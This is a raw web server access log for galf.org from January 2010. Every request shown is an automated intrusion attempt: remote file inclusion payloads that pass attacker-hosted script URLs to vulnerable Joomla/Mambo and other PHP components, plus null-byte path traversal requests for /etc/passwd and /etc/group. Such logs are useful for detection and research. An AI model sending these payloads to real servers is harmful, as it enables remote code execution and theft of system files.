189.14.103.146 - - [04/Jan/2010:00:11:31 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.14.103.146 - - [04/Jan/2010:00:11:37 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:11:58 -0800] "GET /logs/access_090601.log%20%20/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:12:46 -0800] "GET /logs/access_090629.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:12:47 -0800] "GET /logs/access_090907.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:12:51 -0800] "GET /logs/access_090629.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:12:53 -0800] "GET /logs/access_090907.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:13:28 -0800] "GET /logs/access_090629.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:13:38 -0800] "GET /logs/access_090907.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:13:53 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:13:53 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:13:53 -0800] "GET /homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:13:53 -0800] "GET /logs/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:13:56 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:13:57 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:14:03 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.90.213.231 - - [04/Jan/2010:00:14:03 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/access_090928.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /logs/access_091228.log%20%20/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:14:19 -0800] "GET /homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:14:45 -0800] "GET /logs/access.log//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:14:45 -0800] "GET /components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:14:48 -0800] "GET /logs//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:15:02 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:15:10 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:15:10 -0800] "GET /logs/access_090629.log//include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:15:21 -0800] "GET /?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:15:21 -0800] "GET /logs/access_091228.log/?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:15:21 -0800] "GET /logs/?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:15:21 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:15:21 -0800] "GET /logs//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:15:21 -0800] "GET /components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:16:06 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:16:06 -0800] "GET /logs/access_091228.log%20%20//agendax/addevent.inc.php?agendax_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:16:06 -0800] "GET /agendax/addevent.inc.php?agendax_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.228.161.3 - - [04/Jan/2010:00:16:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
67.228.161.3 - - [04/Jan/2010:00:17:16 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
67.228.161.3 - - [04/Jan/2010:00:17:16 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
67.228.161.3 - - [04/Jan/2010:00:17:16 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.828" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:17:37 -0800] "GET /logs//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:17:37 -0800] "GET /components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:17:37 -0800] "GET /logs/access.log//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:17:43 -0800] "GET /logs/access_090928.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:17:43 -0800] "GET /logs/access_091228.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:00:17:46 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:00:17:46 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:18:09 -0800] "GET /logs/access_090928.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:18:09 -0800] "GET /logs/access_091228.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:18:13 -0800] "GET /logs/access_091228.log//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:18:13 -0800] "GET /logs//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:18:13 -0800] "GET /components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:18:22 -0800] "GET /logs/access_091228.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:18:22 -0800] "GET /logs/access_090928.log/homepage.php?sel=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:18:23 -0800] "GET /logs/access_090629.log%20%20//include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:18:39 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:18:40 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.giffarine.co.th/website/Production_Thai/x1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:18:55 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:18:59 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:00:19:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [04/Jan/2010:00:19:14 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:00:19:16 -0800] "GET /logs/access_090713.log%20%20//include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:19:26 -0800] "GET /logs/access_090831.log/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:19:26 -0800] "GET /index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:19:26 -0800] "GET /logs/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:19:26 -0800] "GET /logs/access_091228.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:19:26 -0800] "GET /logs/access_091221.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.youronlive.com/modules/Forums/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.2.201.96 - - [04/Jan/2010:00:19:48 -0800] "GET /logs/access_091214.log/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:21:53 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
209.92.156.53 - - [04/Jan/2010:00:22:43 -0800] "GET /logs/access_091228.log//agendax/addevent.inc.php?agendax_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:23:30 -0800] "GET /logs/access_091228.log%20%20//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:23:30 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:23:51 -0800] "GET /logs///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:23:51 -0800] "GET //vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:23:51 -0800] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.47.7.71 - - [04/Jan/2010:00:24:38 -0800] "GET /logs/access_091228.log%20%20//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [04/Jan/2010:00:24:38 -0800] "GET /logs/access.log%20%20//components/errors.php?error=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:19 -0800] "GET /logs///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:19 -0800] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:19 -0800] "GET //vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:38 -0800] "GET //vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:38 -0800] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:25:38 -0800] "GET /logs///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.2.201.96 - - [04/Jan/2010:00:25:50 -0800] "GET /logs/access_090831.log%20/index2.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
212.96.168.169 - - [04/Jan/2010:00:26:04 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:26:05 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
212.96.168.169 - - [04/Jan/2010:00:26:05 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://indo.home.ro/idscan.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:27:05 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:28:36 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:28:51 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:00:33:05 -0800] "GET /logs/access_091207.log//include/admin.lib.inc.php?site_path=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:34:56 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:34:56 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:34:56 -0800] "GET /logs/access.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [04/Jan/2010:00:35:48 -0800] "GET /logs/access_091228.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:35:53 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:35:53 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:35:53 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:07 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:07 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:07 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:15 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:15 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:15 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:21 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:21 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:21 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:32 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:32 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:32 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:33 -0800] "GET /logs/access_091228.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:33 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:36:33 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:37:11 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:37:11 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:37:11 -0800] "GET /logs/access_091221.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:37:20 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:00:37:20 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
